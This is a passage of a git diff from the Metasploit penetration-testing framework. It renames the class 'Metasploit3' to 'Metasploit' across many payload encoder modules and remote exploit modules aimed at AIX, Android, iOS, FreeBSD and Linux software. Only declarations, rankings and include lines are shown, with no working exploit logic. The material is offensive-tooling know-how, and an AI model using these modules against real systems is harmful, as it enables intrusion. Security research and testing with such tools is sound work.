b/modules/encoders/cmd/echo.rb index 95911f0ded..bef7893628 100644 --- a/modules/encoders/cmd/echo.rb +++ b/modules/encoders/cmd/echo.rb @@ -7,7 +7,7 @@ require 'msf/core' -class Metasploit3 < Msf::Encoder +class Metasploit < Msf::Encoder Rank = GoodRanking diff --git a/modules/encoders/cmd/generic_sh.rb b/modules/encoders/cmd/generic_sh.rb index 16e62302ef..f51056a05e 100644 --- a/modules/encoders/cmd/generic_sh.rb +++ b/modules/encoders/cmd/generic_sh.rb @@ -7,7 +7,7 @@ require 'msf/core' -class Metasploit3 < Msf::Encoder +class Metasploit < Msf::Encoder # Has some issues, but overall it's pretty good Rank = ManualRanking diff --git a/modules/encoders/cmd/ifs.rb b/modules/encoders/cmd/ifs.rb index 602b3508d2..8ae828035f 100644 --- a/modules/encoders/cmd/ifs.rb +++ b/modules/encoders/cmd/ifs.rb @@ -7,7 +7,7 @@ require 'msf/core' -class Metasploit3 < Msf::Encoder +class Metasploit < Msf::Encoder # Below normal ranking because this will produce incorrect code a lot of # the time. diff --git a/modules/encoders/cmd/perl.rb b/modules/encoders/cmd/perl.rb index 0236e0191e..467a606ac2 100644 --- a/modules/encoders/cmd/perl.rb +++ b/modules/encoders/cmd/perl.rb @@ -7,7 +7,7 @@ require 'msf/core' -class Metasploit3 < Msf::Encoder +class Metasploit < Msf::Encoder Rank = NormalRanking diff --git a/modules/encoders/cmd/powershell_base64.rb b/modules/encoders/cmd/powershell_base64.rb index e30a7a359a..9461059fe3 100644 --- a/modules/encoders/cmd/powershell_base64.rb +++ b/modules/encoders/cmd/powershell_base64.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Encoder +class Metasploit < Msf::Encoder Rank = ExcellentRanking def initialize diff --git a/modules/encoders/cmd/printf_php_mq.rb b/modules/encoders/cmd/printf_php_mq.rb index c713d4379a..d323e48a4e 100644 --- a/modules/encoders/cmd/printf_php_mq.rb +++ b/modules/encoders/cmd/printf_php_mq.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Encoder +class Metasploit < Msf::Encoder # Has some issues, but overall it's pretty good # - printf(1) may not be available diff --git a/modules/encoders/generic/eicar.rb b/modules/encoders/generic/eicar.rb index 7db8116178..a62b7f4baf 100644 --- a/modules/encoders/generic/eicar.rb +++ b/modules/encoders/generic/eicar.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Encoder +class Metasploit < Msf::Encoder # Set to ManualRanking because actually using ths encoder will # certainly destroy any possibility of a successful shell. diff --git a/modules/encoders/generic/none.rb b/modules/encoders/generic/none.rb index 6703a746d8..46ef9a6a11 100644 --- a/modules/encoders/generic/none.rb +++ b/modules/encoders/generic/none.rb @@ -7,7 +7,7 @@ require 'msf/core' -class Metasploit3 < Msf::Encoder +class Metasploit < Msf::Encoder def initialize super( diff --git a/modules/encoders/mipsbe/byte_xori.rb b/modules/encoders/mipsbe/byte_xori.rb index dbe78d536b..f5b1ee6521 100644 --- a/modules/encoders/mipsbe/byte_xori.rb +++ b/modules/encoders/mipsbe/byte_xori.rb @@ -8,7 +8,7 @@ require 'msf/core' require 'metasm' -class Metasploit3 < Msf::Encoder::Xor +class Metasploit < Msf::Encoder::Xor Rank = NormalRanking diff --git a/modules/encoders/mipsbe/longxor.rb b/modules/encoders/mipsbe/longxor.rb index a0fe137c57..11a8d75a31 100644 --- a/modules/encoders/mipsbe/longxor.rb +++ b/modules/encoders/mipsbe/longxor.rb @@ -8,7 +8,7 @@ require 'msf/core' require 'metasm' -class Metasploit3 < Msf::Encoder::Xor +class Metasploit < Msf::Encoder::Xor def initialize super( diff --git a/modules/encoders/mipsle/byte_xori.rb b/modules/encoders/mipsle/byte_xori.rb index 7492549ead..f19d8021b7 100644 --- a/modules/encoders/mipsle/byte_xori.rb +++ b/modules/encoders/mipsle/byte_xori.rb @@ -8,7 +8,7 @@ require 'msf/core' require 'metasm' -class Metasploit3 < Msf::Encoder::Xor +class Metasploit < Msf::Encoder::Xor Rank = NormalRanking diff --git a/modules/encoders/mipsle/longxor.rb b/modules/encoders/mipsle/longxor.rb index 2e1eff8ab9..0ba2bf55b0 100644 --- a/modules/encoders/mipsle/longxor.rb +++ b/modules/encoders/mipsle/longxor.rb @@ -8,7 +8,7 @@ require 'msf/core' require 'metasm' -class Metasploit3 < Msf::Encoder::Xor +class Metasploit < Msf::Encoder::Xor def initialize super( diff --git a/modules/encoders/php/base64.rb b/modules/encoders/php/base64.rb index 05327a5233..0cd2c36793 100644 --- a/modules/encoders/php/base64.rb +++ b/modules/encoders/php/base64.rb @@ -7,7 +7,7 @@ require 'msf/core' -class Metasploit3 < Msf::Encoder +class Metasploit < Msf::Encoder Rank = GreatRanking def initialize diff --git a/modules/encoders/ppc/longxor.rb b/modules/encoders/ppc/longxor.rb index 1621e2a3e8..62c4e22dcb 100644 --- a/modules/encoders/ppc/longxor.rb +++ b/modules/encoders/ppc/longxor.rb @@ -7,7 +7,7 @@ require 'msf/core' -class Metasploit3 < Msf::Encoder::Xor +class Metasploit < Msf::Encoder::Xor def initialize super( diff --git a/modules/encoders/ppc/longxor_tag.rb b/modules/encoders/ppc/longxor_tag.rb index b0e6a90bd2..0bbac93484 100644 --- a/modules/encoders/ppc/longxor_tag.rb +++ b/modules/encoders/ppc/longxor_tag.rb @@ -7,7 +7,7 @@ require 'msf/core' -class Metasploit3 < Msf::Encoder::Xor +class Metasploit < Msf::Encoder::Xor def initialize super( diff --git a/modules/encoders/sparc/longxor_tag.rb b/modules/encoders/sparc/longxor_tag.rb index 34995ec80e..6225520ba1 100644 --- a/modules/encoders/sparc/longxor_tag.rb +++ b/modules/encoders/sparc/longxor_tag.rb @@ -7,7 +7,7 @@ require 'msf/core' -class Metasploit3 < Msf::Encoder::XorAdditiveFeedback +class Metasploit < Msf::Encoder::XorAdditiveFeedback def initialize super( diff --git a/modules/encoders/x64/xor.rb b/modules/encoders/x64/xor.rb index 73586cccc7..436ea2ea74 100644 --- a/modules/encoders/x64/xor.rb +++ b/modules/encoders/x64/xor.rb @@ -7,7 +7,7 @@ require 'msf/core' -class Metasploit3 < Msf::Encoder::Xor +class Metasploit < Msf::Encoder::Xor def initialize super( diff --git a/modules/encoders/x86/add_sub.rb b/modules/encoders/x86/add_sub.rb index 93c6c7a014..ae4f37db10 100644 --- a/modules/encoders/x86/add_sub.rb +++ b/modules/encoders/x86/add_sub.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Encoder +class Metasploit < Msf::Encoder Rank = ManualRanking diff --git a/modules/encoders/x86/alpha_mixed.rb b/modules/encoders/x86/alpha_mixed.rb index 2376e6dd61..dd5a18df0e 100644 --- a/modules/encoders/x86/alpha_mixed.rb +++ b/modules/encoders/x86/alpha_mixed.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'rex/encoder/alpha2/alpha_mixed' -class Metasploit3 < Msf::Encoder::Alphanum +class Metasploit < Msf::Encoder::Alphanum Rank = LowRanking def initialize diff --git a/modules/encoders/x86/alpha_upper.rb b/modules/encoders/x86/alpha_upper.rb index 0430d6f403..9b195ba677 100644 --- a/modules/encoders/x86/alpha_upper.rb +++ b/modules/encoders/x86/alpha_upper.rb @@ -8,7 +8,7 @@ require 'msf/core' require 'rex/encoder/alpha2/alpha_upper' -class Metasploit3 < Msf::Encoder::Alphanum +class Metasploit < Msf::Encoder::Alphanum Rank = LowRanking diff --git a/modules/encoders/x86/avoid_underscore_tolower.rb b/modules/encoders/x86/avoid_underscore_tolower.rb index 44180f5a9e..d8d13ac1fc 100644 --- a/modules/encoders/x86/avoid_underscore_tolower.rb +++ b/modules/encoders/x86/avoid_underscore_tolower.rb @@ -6,7 +6,7 @@ require 'msf/core' -class Metasploit3 < Msf::Encoder +class Metasploit < Msf::Encoder # This encoder has a manual ranking because it should only be used in cases # where information has been explicitly supplied, like the BufferOffset. diff --git a/modules/encoders/x86/avoid_utf8_tolower.rb b/modules/encoders/x86/avoid_utf8_tolower.rb index 238e87b60e..0558d36fcf 100644 --- a/modules/encoders/x86/avoid_utf8_tolower.rb +++ b/modules/encoders/x86/avoid_utf8_tolower.rb @@ -88,7 +88,7 @@ require 'msf/core' # 0000004A 3401 xor al,0x1 # 0000004C 7F db 0x7F # -class Metasploit3 < Msf::Encoder +class Metasploit < Msf::Encoder # This encoder has a manual ranking because it should only be used in cases # where information has been explicitly supplied, like the BufferOffset. diff --git a/modules/encoders/x86/call4_dword_xor.rb b/modules/encoders/x86/call4_dword_xor.rb index c49f4572a9..149c3ffd22 100644 --- a/modules/encoders/x86/call4_dword_xor.rb +++ b/modules/encoders/x86/call4_dword_xor.rb @@ -7,7 +7,7 @@ require 'msf/core' -class Metasploit3 < Msf::Encoder::Xor +class Metasploit < Msf::Encoder::Xor def initialize super( diff --git a/modules/encoders/x86/context_cpuid.rb b/modules/encoders/x86/context_cpuid.rb index b354574539..2360890069 100644 --- a/modules/encoders/x86/context_cpuid.rb +++ b/modules/encoders/x86/context_cpuid.rb @@ -6,7 +6,7 @@ require 'rex/poly' require 'msf/core' -class Metasploit3 < Msf::Encoder::XorAdditiveFeedback +class Metasploit < Msf::Encoder::XorAdditiveFeedback # Manual ranking because the cpuid value is generated and supplied # manually... diff --git a/modules/encoders/x86/context_stat.rb b/modules/encoders/x86/context_stat.rb index 4de58d3824..d485c6119d 100644 --- a/modules/encoders/x86/context_stat.rb +++ b/modules/encoders/x86/context_stat.rb @@ -6,7 +6,7 @@ require 'rex/poly' require 'msf/core' -class Metasploit3 < Msf::Encoder::XorAdditiveFeedback +class Metasploit < Msf::Encoder::XorAdditiveFeedback # Manual ranking because the stat(2) key is generated and supplied # manually. diff --git a/modules/encoders/x86/context_time.rb b/modules/encoders/x86/context_time.rb index f5db335623..7a058aac66 100644 --- a/modules/encoders/x86/context_time.rb +++ b/modules/encoders/x86/context_time.rb @@ -6,7 +6,7 @@ require 'rex/poly' require 'msf/core' -class Metasploit3 < Msf::Encoder::XorAdditiveFeedback +class Metasploit < Msf::Encoder::XorAdditiveFeedback # Manual ranking because the time(2) key is generated and supplied # manually. diff --git a/modules/encoders/x86/countdown.rb b/modules/encoders/x86/countdown.rb index 78faa90631..c7cd4acf26 100644 --- a/modules/encoders/x86/countdown.rb +++ b/modules/encoders/x86/countdown.rb @@ -7,7 +7,7 @@ require 'msf/core' -class Metasploit3 < Msf::Encoder::Xor +class Metasploit < Msf::Encoder::Xor def initialize super( diff --git a/modules/encoders/x86/fnstenv_mov.rb b/modules/encoders/x86/fnstenv_mov.rb index f942c29eb9..b2490ad61e 100644 --- a/modules/encoders/x86/fnstenv_mov.rb +++ b/modules/encoders/x86/fnstenv_mov.rb @@ -7,7 +7,7 @@ require 'msf/core' -class Metasploit3 < Msf::Encoder::Xor +class Metasploit < Msf::Encoder::Xor def initialize super( diff --git a/modules/encoders/x86/jmp_call_additive.rb b/modules/encoders/x86/jmp_call_additive.rb index 5a0b98d082..57ee0678db 100644 --- a/modules/encoders/x86/jmp_call_additive.rb +++ b/modules/encoders/x86/jmp_call_additive.rb @@ -7,7 +7,7 @@ require 'msf/core' -class Metasploit3 < Msf::Encoder::XorAdditiveFeedback +class Metasploit < Msf::Encoder::XorAdditiveFeedback # Uncomment when we get the poly stuff working again. #Rank = GreatRanking diff --git a/modules/encoders/x86/nonalpha.rb b/modules/encoders/x86/nonalpha.rb index b4e275351e..de022e3064 100644 --- a/modules/encoders/x86/nonalpha.rb +++ b/modules/encoders/x86/nonalpha.rb @@ -8,7 +8,7 @@ require 'msf/core' require 'rex/encoder/nonalpha' -class Metasploit3 < Msf::Encoder::NonAlpha +class Metasploit < Msf::Encoder::NonAlpha Rank = LowRanking diff --git a/modules/encoders/x86/nonupper.rb b/modules/encoders/x86/nonupper.rb index 48a261b1f7..d42f9d9f05 100644 --- a/modules/encoders/x86/nonupper.rb +++ b/modules/encoders/x86/nonupper.rb @@ -8,7 +8,7 @@ require 'msf/core' require 'rex/encoder/nonupper' -class Metasploit3 < Msf::Encoder::NonUpper +class Metasploit < Msf::Encoder::NonUpper Rank = LowRanking diff --git a/modules/encoders/x86/opt_sub.rb b/modules/encoders/x86/opt_sub.rb index a28dbc3702..66219a9c74 100644 --- a/modules/encoders/x86/opt_sub.rb +++ b/modules/encoders/x86/opt_sub.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Encoder +class Metasploit < Msf::Encoder Rank = ManualRanking diff --git a/modules/encoders/x86/shikata_ga_nai.rb b/modules/encoders/x86/shikata_ga_nai.rb index 14487f60bc..10a1002481 100644 --- a/modules/encoders/x86/shikata_ga_nai.rb +++ b/modules/encoders/x86/shikata_ga_nai.rb @@ -8,7 +8,7 @@ require 'rex/poly' require 'msf/core' -class Metasploit3 < Msf::Encoder::XorAdditiveFeedback +class Metasploit < Msf::Encoder::XorAdditiveFeedback # The shikata encoder has an excellent ranking because it is polymorphic. # Party time, excellent! diff --git a/modules/encoders/x86/single_static_bit.rb b/modules/encoders/x86/single_static_bit.rb index e4bb69f6d1..ab6913d790 100644 --- a/modules/encoders/x86/single_static_bit.rb +++ b/modules/encoders/x86/single_static_bit.rb @@ -12,7 +12,7 @@ require 'msf/core' # The decoder has been tested with all possible values, but the decoder stub # is was not designed to bypass restrictions other than "bit 5 must be on".. # -class Metasploit3 < Msf::Encoder +class Metasploit < Msf::Encoder # This encoder has a manual ranking because it should only be used in cases # where information has been explicitly supplied, specifically diff --git a/modules/encoders/x86/unicode_mixed.rb b/modules/encoders/x86/unicode_mixed.rb index 255f7f21d4..88a51e5d0d 100644 --- a/modules/encoders/x86/unicode_mixed.rb +++ b/modules/encoders/x86/unicode_mixed.rb @@ -8,7 +8,7 @@ require 'msf/core' require 'rex/encoder/alpha2/unicode_mixed' -class Metasploit3 < Msf::Encoder::Alphanum +class Metasploit < Msf::Encoder::Alphanum Rank = ManualRanking diff --git a/modules/encoders/x86/unicode_upper.rb b/modules/encoders/x86/unicode_upper.rb index 821d6f5c92..90cc620f90 100644 --- a/modules/encoders/x86/unicode_upper.rb +++ b/modules/encoders/x86/unicode_upper.rb @@ -8,7 +8,7 @@ require 'msf/core' require 'rex/encoder/alpha2/unicode_upper' -class Metasploit3 < Msf::Encoder::Alphanum +class Metasploit < Msf::Encoder::Alphanum Rank = ManualRanking diff --git a/modules/exploits/aix/rpc_cmsd_opcode21.rb b/modules/exploits/aix/rpc_cmsd_opcode21.rb index ad11665a90..a746b3c717 100644 --- a/modules/exploits/aix/rpc_cmsd_opcode21.rb +++ b/modules/exploits/aix/rpc_cmsd_opcode21.rb @@ -7,7 +7,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = GreatRanking include Msf::Exploit::Remote::SunRPC diff --git a/modules/exploits/aix/rpc_ttdbserverd_realpath.rb b/modules/exploits/aix/rpc_ttdbserverd_realpath.rb index 3e8a17e173..187842ba33 100644 --- a/modules/exploits/aix/rpc_ttdbserverd_realpath.rb +++ b/modules/exploits/aix/rpc_ttdbserverd_realpath.rb @@ -6,7 +6,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = GreatRanking include Msf::Exploit::Remote::SunRPC diff --git a/modules/exploits/android/adb/adb_server_exec.rb b/modules/exploits/android/adb/adb_server_exec.rb index d1d13e601c..1b297fffe2 100644 --- a/modules/exploits/android/adb/adb_server_exec.rb +++ b/modules/exploits/android/adb/adb_server_exec.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'rex/proto/adb' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/android/browser/samsung_knox_smdm_url.rb b/modules/exploits/android/browser/samsung_knox_smdm_url.rb index 5b3c906329..cdf695b1d2 100644 --- a/modules/exploits/android/browser/samsung_knox_smdm_url.rb +++ b/modules/exploits/android/browser/samsung_knox_smdm_url.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'digest/md5' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::BrowserExploitServer diff --git a/modules/exploits/android/browser/webview_addjavascriptinterface.rb b/modules/exploits/android/browser/webview_addjavascriptinterface.rb index 5da4b1aabc..39d0b241cc 100644 --- a/modules/exploits/android/browser/webview_addjavascriptinterface.rb +++ b/modules/exploits/android/browser/webview_addjavascriptinterface.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'msf/core/exploit/android' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::BrowserExploitServer diff --git a/modules/exploits/android/fileformat/adobe_reader_pdf_js_interface.rb b/modules/exploits/android/fileformat/adobe_reader_pdf_js_interface.rb index 1ac2e4a2b6..840e38c742 100644 --- a/modules/exploits/android/fileformat/adobe_reader_pdf_js_interface.rb +++ b/modules/exploits/android/fileformat/adobe_reader_pdf_js_interface.rb @@ -8,7 +8,7 @@ require 'msf/core/exploit/fileformat' require 'msf/core/exploit/pdf' require 'msf/core/exploit/android' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::FILEFORMAT diff --git a/modules/exploits/apple_ios/browser/safari_libtiff.rb b/modules/exploits/apple_ios/browser/safari_libtiff.rb index 1217a5735b..180d3bb99f 100644 --- a/modules/exploits/apple_ios/browser/safari_libtiff.rb +++ b/modules/exploits/apple_ios/browser/safari_libtiff.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = GoodRanking # diff --git a/modules/exploits/apple_ios/email/mobilemail_libtiff.rb b/modules/exploits/apple_ios/email/mobilemail_libtiff.rb index 99882d452c..d019248c21 100644 --- a/modules/exploits/apple_ios/email/mobilemail_libtiff.rb +++ b/modules/exploits/apple_ios/email/mobilemail_libtiff.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = GoodRanking # diff --git a/modules/exploits/apple_ios/ssh/cydia_default_ssh.rb b/modules/exploits/apple_ios/ssh/cydia_default_ssh.rb index 2b6fdc0353..ecf7a2e527 100644 --- a/modules/exploits/apple_ios/ssh/cydia_default_ssh.rb +++ b/modules/exploits/apple_ios/ssh/cydia_default_ssh.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'net/ssh' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Auxiliary::CommandShell diff --git a/modules/exploits/bsdi/softcart/mercantec_softcart.rb b/modules/exploits/bsdi/softcart/mercantec_softcart.rb index 6fe5362b96..05b3c5f3d2 100644 --- a/modules/exploits/bsdi/softcart/mercantec_softcart.rb +++ b/modules/exploits/bsdi/softcart/mercantec_softcart.rb @@ -7,7 +7,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = GreatRanking include Msf::Exploit::Brute diff --git a/modules/exploits/dialup/multi/login/manyargs.rb b/modules/exploits/dialup/multi/login/manyargs.rb index c4d398710d..e065e51e1b 100644 --- a/modules/exploits/dialup/multi/login/manyargs.rb +++ b/modules/exploits/dialup/multi/login/manyargs.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::Remote::Dialup diff --git a/modules/exploits/firefox/local/exec_shellcode.rb b/modules/exploits/firefox/local/exec_shellcode.rb index 043290fb83..0926c77b21 100644 --- a/modules/exploits/firefox/local/exec_shellcode.rb +++ b/modules/exploits/firefox/local/exec_shellcode.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'msf/core/payload/firefox' -class Metasploit3 < Msf::Exploit::Local +class Metasploit < Msf::Exploit::Local include Msf::Payload::Firefox include Msf::Exploit::Remote::FirefoxPrivilegeEscalation diff --git a/modules/exploits/freebsd/ftp/proftp_telnet_iac.rb b/modules/exploits/freebsd/ftp/proftp_telnet_iac.rb index d7382725c1..410e7bd2d2 100644 --- a/modules/exploits/freebsd/ftp/proftp_telnet_iac.rb +++ b/modules/exploits/freebsd/ftp/proftp_telnet_iac.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = GreatRanking include Msf::Exploit::Remote::Ftp diff --git a/modules/exploits/freebsd/misc/citrix_netscaler_soap_bof.rb b/modules/exploits/freebsd/misc/citrix_netscaler_soap_bof.rb index b204008a4a..3c62a69877 100644 --- a/modules/exploits/freebsd/misc/citrix_netscaler_soap_bof.rb +++ b/modules/exploits/freebsd/misc/citrix_netscaler_soap_bof.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/freebsd/samba/trans2open.rb b/modules/exploits/freebsd/samba/trans2open.rb index 56bb341327..fa3e84cfc5 100644 --- a/modules/exploits/freebsd/samba/trans2open.rb +++ b/modules/exploits/freebsd/samba/trans2open.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = GreatRanking include Msf::Exploit::Remote::SMB::Client diff --git a/modules/exploits/freebsd/tacacs/xtacacsd_report.rb b/modules/exploits/freebsd/tacacs/xtacacsd_report.rb index c2b302d0a0..1ae505f355 100644 --- a/modules/exploits/freebsd/tacacs/xtacacsd_report.rb +++ b/modules/exploits/freebsd/tacacs/xtacacsd_report.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = AverageRanking include Msf::Exploit::Remote::Udp diff --git a/modules/exploits/freebsd/telnet/telnet_encrypt_keyid.rb b/modules/exploits/freebsd/telnet/telnet_encrypt_keyid.rb index 033eee1c4e..ee280c6e5b 100644 --- a/modules/exploits/freebsd/telnet/telnet_encrypt_keyid.rb +++ b/modules/exploits/freebsd/telnet/telnet_encrypt_keyid.rb @@ -9,7 +9,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = GreatRanking include Msf::Exploit::Remote::Telnet diff --git a/modules/exploits/hpux/lpd/cleanup_exec.rb b/modules/exploits/hpux/lpd/cleanup_exec.rb index 0a2b902014..7eb1bac297 100644 --- a/modules/exploits/hpux/lpd/cleanup_exec.rb +++ b/modules/exploits/hpux/lpd/cleanup_exec.rb @@ -7,7 +7,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/irix/lpd/tagprinter_exec.rb b/modules/exploits/irix/lpd/tagprinter_exec.rb index b80a21d738..926a3de255 100644 --- a/modules/exploits/irix/lpd/tagprinter_exec.rb +++ b/modules/exploits/irix/lpd/tagprinter_exec.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/linux/antivirus/escan_password_exec.rb b/modules/exploits/linux/antivirus/escan_password_exec.rb index ed93ca2559..2609de0621 100644 --- a/modules/exploits/linux/antivirus/escan_password_exec.rb +++ b/modules/exploits/linux/antivirus/escan_password_exec.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/linux/browser/adobe_flashplayer_aslaunch.rb b/modules/exploits/linux/browser/adobe_flashplayer_aslaunch.rb index 5e2674723a..2d913961be 100644 --- a/modules/exploits/linux/browser/adobe_flashplayer_aslaunch.rb +++ b/modules/exploits/linux/browser/adobe_flashplayer_aslaunch.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/linux/ftp/proftp_sreplace.rb b/modules/exploits/linux/ftp/proftp_sreplace.rb index b5c8c3d0e8..4ea9b47e01 100644 --- a/modules/exploits/linux/ftp/proftp_sreplace.rb +++ b/modules/exploits/linux/ftp/proftp_sreplace.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = GreatRanking include Msf::Exploit::Remote::Ftp diff --git a/modules/exploits/linux/ftp/proftp_telnet_iac.rb b/modules/exploits/linux/ftp/proftp_telnet_iac.rb index 5891da9e62..7b478db3f6 100644 --- a/modules/exploits/linux/ftp/proftp_telnet_iac.rb +++ b/modules/exploits/linux/ftp/proftp_telnet_iac.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = GreatRanking #include Msf::Exploit::Remote::Ftp diff --git a/modules/exploits/linux/games/ut2004_secure.rb b/modules/exploits/linux/games/ut2004_secure.rb index 569747d8a1..dc6db48c8c 100644 --- a/modules/exploits/linux/games/ut2004_secure.rb +++ b/modules/exploits/linux/games/ut2004_secure.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::Remote::Udp diff --git a/modules/exploits/linux/http/accellion_fta_getstatus_oauth.rb b/modules/exploits/linux/http/accellion_fta_getstatus_oauth.rb index 6640a05340..7fa54b49da 100644 --- a/modules/exploits/linux/http/accellion_fta_getstatus_oauth.rb +++ b/modules/exploits/linux/http/accellion_fta_getstatus_oauth.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/linux/http/airties_login_cgi_bof.rb b/modules/exploits/linux/http/airties_login_cgi_bof.rb index a64e532d2a..bf4a577861 100644 --- a/modules/exploits/linux/http/airties_login_cgi_bof.rb +++ b/modules/exploits/linux/http/airties_login_cgi_bof.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/linux/http/alcatel_omnipcx_mastercgi_exec.rb b/modules/exploits/linux/http/alcatel_omnipcx_mastercgi_exec.rb index e3a9832d88..9540fa09f9 100644 --- a/modules/exploits/linux/http/alcatel_omnipcx_mastercgi_exec.rb +++ b/modules/exploits/linux/http/alcatel_omnipcx_mastercgi_exec.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = ManualRanking # Only interactive single commands supported include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/linux/http/alienvault_sqli_exec.rb b/modules/exploits/linux/http/alienvault_sqli_exec.rb index 0805c4f7c4..3f9bdf7cad 100644 --- a/modules/exploits/linux/http/alienvault_sqli_exec.rb +++ b/modules/exploits/linux/http/alienvault_sqli_exec.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/linux/http/astium_sqli_upload.rb b/modules/exploits/linux/http/astium_sqli_upload.rb index e08ec2ccf0..be5617cb73 100644 --- a/modules/exploits/linux/http/astium_sqli_upload.rb +++ b/modules/exploits/linux/http/astium_sqli_upload.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = ManualRanking # Configuration is overwritten and service reloaded include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/linux/http/belkin_login_bof.rb b/modules/exploits/linux/http/belkin_login_bof.rb index 7ead5ddb5a..6b56f2b41b 100644 --- a/modules/exploits/linux/http/belkin_login_bof.rb +++ b/modules/exploits/linux/http/belkin_login_bof.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/linux/http/centreon_sqli_exec.rb b/modules/exploits/linux/http/centreon_sqli_exec.rb index 3ed353e001..0c83c55c17 100644 --- a/modules/exploits/linux/http/centreon_sqli_exec.rb +++ b/modules/exploits/linux/http/centreon_sqli_exec.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/linux/http/ddwrt_cgibin_exec.rb b/modules/exploits/linux/http/ddwrt_cgibin_exec.rb index 0b43b461ad..ba4ea02a6a 100644 --- a/modules/exploits/linux/http/ddwrt_cgibin_exec.rb +++ b/modules/exploits/linux/http/ddwrt_cgibin_exec.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = ExcellentRanking HttpFingerprint = { 